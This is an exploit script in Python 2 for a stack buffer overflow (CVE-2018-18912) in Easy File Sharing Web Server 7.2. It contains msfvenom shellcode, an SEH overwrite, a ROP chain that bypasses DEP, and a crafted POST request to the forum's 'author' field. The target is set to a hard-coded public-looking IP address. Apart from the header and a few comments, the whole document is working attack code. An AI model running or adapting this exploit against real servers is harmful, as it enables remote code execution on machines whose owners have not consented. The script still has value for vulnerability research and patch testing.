# Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH)
# Date: November 5, 2018
# Exploit Author: Kristijan Antic
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 10.0.17134 x64
# CVE : CVE-2018-18912
# 1. Description: An issue was discovered in Easy File Sharing (EFS) Web Server 7.2.
# A stack-based buffer overflow occurs when an authenticated user sends
# a malicious POST request to forum.ghp when creating a new topic in
# the forums, which allows remote attackers to execute arbitrary code.
# 2. Proof of Concept
import socket
import struct
# Target endpoint read by send_malformed_buffer(); note that the HTTP Host
# header further down is a separate literal and is not derived from HOST.
HOST, PORT = '81.82.253.190', 81
def p32(v):
    """Pack *v* as a 4-byte little-endian unsigned integer (struct format '<L').

    Raises struct.error if *v* does not fit in 32 unsigned bits.
    """
    packer = struct.Struct("<L")
    return packer.pack(v)
def send_malformed_buffer(data):
    """Open a TCP connection to HOST:PORT, write *data* once, and close it.

    Uses socket.send(), so a short write is not retried, and no response is
    read back. The socket is not closed if connect() or send() raises.
    """
    target = (HOST, PORT)
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect(target)
    conn.send(data)
    conn.close()
#msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python
# NOTE: this is a Python 2 script. The string literals below are byte strings
# there and are concatenated with struct.pack() output; under Python 3 the same
# concatenation (str + bytes) raises TypeError.
shellcode = ""
shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42"
shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa"
shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d"
shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b"
shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21"
shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21"
shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e"
shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92"
shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2"
shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6"
shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1"
shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8"
shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa"
shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc"
shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a"
shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9"
shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa"
shellcode += "\xb9\xe4"
# ---====GADGETS====---
# Hard-coded addresses. The comment on the MOV gadget below names
# ImageLoad.dll, so these presumably belong to that specific module build;
# they cannot be validated from this file alone.
ropnop = 0x1001a858
pop_eax_retn = 0x10015442
stack_pivot_addr = 0x10022869
pop_esi_retn = 0x1001c8e4
pop_ebx_retn = 0x10012F3C
pop_ecx_retn = 0x1001FC4C
neg_eax_retn = 0x100231cd
add_ebx_eax = 0x1001DA09
pop_edi_retn = 0x1001A648
xor_edx_edx = 0x10022C4C
inc_edx = 0x61c059a0
pop_ebp_retn = 0x1001add7
push_esp_retn = 0x61c24169
pushad_retn = 0x100240c2
ropchain = ''
buff = 'A' * 64
buff += 'BBBB' #nseh
buff += struct.pack("<L", stack_pivot_addr) #handler
buff += 'F' * 2348
ropchain += p32(pop_eax_retn)
ropchain += p32(0x61c832d0) #need to deref
ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
ropchain += p32(0x61c18d81)
ropchain += p32(0x1001d626)
ropchain += p32(0x10021a3e)
#EBP = ReturnTo() rop gadget to push esp ret
ropchain += p32(pop_ebp_retn)
ropchain += p32(push_esp_retn)
#EDX = NewProtect(0x40) -- 64 inc_edx gadgets follow (0x40 == 64)
ropchain += p32(xor_edx_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
#ECX = lpOldProtect (ptr to writable address address)
ropchain += p32(pop_ecx_retn)
ropchain += p32(0x61c730ad)
#EBX = dwSize()
ropchain += p32(pop_eax_retn)
ropchain += p32(0xFFFFFFFE)
ropchain += p32(neg_eax_retn)
ropchain += p32(add_ebx_eax)
#EDI = ROP NOP
ropchain += p32(pop_edi_retn)
ropchain += p32(ropnop)
#EAX = NOP (0x90909090)
ropchain += p32(pop_eax_retn)
ropchain += p32(0x10027010) #will inc one byte at this addr
ropchain += p32(pop_eax_retn)
ropchain += p32(0x90909090)
#PUSHAD
ropchain += p32(pushad_retn)
ropchain += '\x90' * 4
ropchain += shellcode
buff += ropchain
# Raw HTTP/1.1 request assembled by hand; the overflowing value is sent in
# the 'author' form field (see the exploit title above). Fixed session
# values (Cookie, SESSIONID) are literals taken from the author's test run.
request = ''
request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n"
# NOTE(review): the Host header is a fixed literal and is not derived from
# HOST above, so the two disagree unless edited together.
request += "Host: 192.168.184.1\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "User-Agent: Mozilla/5.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.9\r\n"
request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n"
request += "Connection: close\r\n"
request += "\r\n"
# No Content-Length header is sent; the body follows the blank line directly.
request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n"
send_malformed_buffer(request)